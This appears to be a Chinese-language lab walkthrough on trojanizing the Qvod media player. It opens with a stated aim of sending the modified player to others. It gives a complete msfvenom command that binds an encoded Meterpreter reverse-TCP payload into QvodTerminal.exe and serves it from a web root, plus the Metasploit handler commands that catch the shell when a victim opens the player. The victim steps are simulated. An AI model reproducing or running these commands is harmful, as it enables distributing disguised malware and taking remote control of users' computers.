给快播软件添加后门拿shell

实验要求：

1. 使用metasploit给快播软件添加后门
2. 将添加后门的快播发送给别人，当打开快播软件时，建立后门连接拿shell

实验过程：

• 打开快播应用程序，查看当主程序运行时有无子程序在运行
  
  

• 在kali上给选中的程序加上后门
  root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 -f exe -x QvodTerminal.exe -o /var/www/html/QvodTerminal.exe
  
  经过以上操作，我们就成功给软件添加了后门程序

• 在kali上开启后门监听，当受害者打开软件时，就会连接上受害者的shell

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.0.105
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > exploit

• 模拟受害者，下载添加了后门的快播软件
  
  

• 替换快播文件夹中的子程序
  

• 打开快播主程序
  

• 回到kali,查看监听状态
  

经过上面的一顿操作后，我们就成功的模拟了一个给真实软件添加后门的过程。